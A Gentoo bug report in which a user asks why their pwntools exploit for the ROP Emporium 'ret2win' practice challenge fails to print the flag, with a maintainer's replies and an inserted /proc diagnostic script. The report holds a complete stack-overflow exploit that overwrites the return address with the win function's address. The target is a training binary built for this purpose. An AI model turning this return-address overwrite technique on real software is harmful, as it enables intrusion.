Bug 880223 - cwd is unlinked before the process closes
Summary: cwd is unlinked before the process closes
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: Current packages (show other bugs)
Hardware: AMD64 Linux
Importance: High normal
Assignee: Gentoo Linux bug wranglers
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:

Reported: 2022-11-07 16:40 UTC by jek1
Modified: 2022-11-11 10:17 UTC
CC List: 0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Description jek1 2022-11-07 16:40:15 UTC
The exploit I attached couldn't cat flag.txt, which is stored in the same directory as the binary. I tried running that script with strace and found this sus thing right where the program should cat flag.txt.
/proc/pid/cwd exists while the program waits for input.

```
readlink("/proc/30556/cwd", 0x7ffcefe695a0, 4096) = -1 ENOENT (No such file or directory)
```

Function that cats flag.txt:

```
[0x7f4f566fa920]> pdf @ sym.ret2win
┌ 27: sym.ret2win ();
│           0x00400756      55             push rbp
│           0x00400757      4889e5         mov rbp, rsp
│           0x0040075a      bf26094000     mov edi, str.Well_done__Heres_your_flag: ; 0x400926 ; "Well done! Here's your flag:"
│           0x0040075f      e8ecfdffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00400764      bf43094000     mov edi, str._bin_cat_flag.txt ; 0x400943 ; "/bin/cat flag.txt"
│           0x00400769      e8f2fdffff     call sym.imp.system         ; int system(const char *string)
│           0x0040076e      90             nop
│           0x0040076f      5d             pop rbp
└           0x00400770      c3             ret
[0x7f4f566fa920]>
```


Screenshot of the issue:
https://imgur.com/a/PB6uQkO

I've tried it on kali, arch, debian and ubuntu in the past.
This is the first time I'm using Gentoo as a bin exploit lab.


link to challenge: https://ropemporium.com/challenge/ret2win.html

Exploit I used:

```
from pwn import *

context.arch = 'amd64'
context.log_level = "error"

exe = ELF("./ret2win")

# 40 bytes of padding reach the saved return address, which is then
# overwritten with the address of sym.ret2win shown in the disassembly above.
offset = 40
payload = flat({
    offset: [
        p64(0x00400756)
    ]
})

io = process(exe.path)

# Send the payload after the challenge's "> " prompt, then dump everything it prints.
io.sendlineafter(b"\n> ", payload)
print(io.recvallS())
```

kernel: 6.0.7
python: 3.10.8
full strace of exploit: https://jek1.co/pastes/strace.txt
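An added diagnostic, not part of the bug report and not code from Gentoo or ROP Emporium: it shows what readlink() on /proc/<pid>/cwd returns in each possible state, so an ENOENT like the one in the strace line above can be told apart from a genuinely unlinked working directory. It assumes a Linux procfs mounted at /proc; the child process and the scratch directory are constructed for the demonstration.

```python
import os
import subprocess
import sys
import tempfile

# Assumption: Linux procfs is mounted at /proc (readlink semantics per proc(5)).
PROC_AVAILABLE = os.path.isdir("/proc/self")

DELETED_SUFFIX = " (deleted)"


def cwd_state(pid):
    """Classify what readlink(/proc/<pid>/cwd) says about a process.

    Returns one of:
      ("alive", path)    process exists and its cwd directory is still linked
      ("deleted", path)  process exists but its cwd directory was unlinked;
                         the kernel appends " (deleted)" to the link target
      ("gone", None)     readlink failed with ENOENT: the /proc entry itself is
                         missing, i.e. the process has exited (the case in the
                         strace output), not that its cwd was removed
    """
    try:
        target = os.readlink(f"/proc/{pid}/cwd")
    except FileNotFoundError:  # ENOENT
        return ("gone", None)
    if target.endswith(DELETED_SUFFIX):
        return ("deleted", target[: -len(DELETED_SUFFIX)])
    return ("alive", target)


def demonstrate():
    """Walk a constructed child process through all three states.

    Returns the list of state names observed, or None when /proc is absent.
    """
    if not PROC_AVAILABLE:
        return None
    workdir = tempfile.mkdtemp(prefix="cwd-demo-")  # constructed scratch dir
    # The child blocks on stdin, like a challenge binary waiting at its prompt.
    child = subprocess.Popen(
        [sys.executable, "-c", "import sys; sys.stdin.readline()"],
        cwd=workdir,
        stdin=subprocess.PIPE,
    )
    states = []
    try:
        states.append(cwd_state(child.pid)[0])  # "alive": cwd still linked
        os.rmdir(workdir)                       # unlink the cwd under the child
        states.append(cwd_state(child.pid)[0])  # "deleted": link target marked
        child.communicate(b"\n")                # child exits and is reaped
        states.append(cwd_state(child.pid)[0])  # "gone": /proc/<pid> no longer exists
    finally:
        if child.poll() is None:
            child.kill()
            child.wait()
        if os.path.isdir(workdir):
            os.rmdir(workdir)
    return states


if __name__ == "__main__":
    print(demonstrate())
```

The distinction is the point: a working directory that has been removed still resolves through /proc, with " (deleted)" appended, for as long as the process lives. readlink failing with ENOENT means the process entry is no longer there, which is what a crashed or exited target looks like to a tracer.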
Comment 1 Sam James (Gentoo Infrastructure, gentoo-dev, Security) 2022-11-10 03:27:31 UTC
1. I'm struggling to see how this would vary across distros at all unless kernel configuration, version, or sysctl toggles are different.

2. Please include a clear set of instructions to reproduce.

3. Please include a text version of the screenshot.
Comment 2 Sam James (Gentoo Infrastructure, gentoo-dev, Security) 2022-11-10 03:48:19 UTC
Just to add: it's not clear anything is actually wrong here with anything we're doing. Exploit development involves handling various edge cases and different behaviour on systems. While it's interesting that you supposedly see something different on Debian, that doesn't make it something that it's my role to fix. For all I know, you just need to adapt your code.
Comment 3 jek1 2022-11-11 10:17:02 UTC
yea mb, those bins don't work with glibc 2.36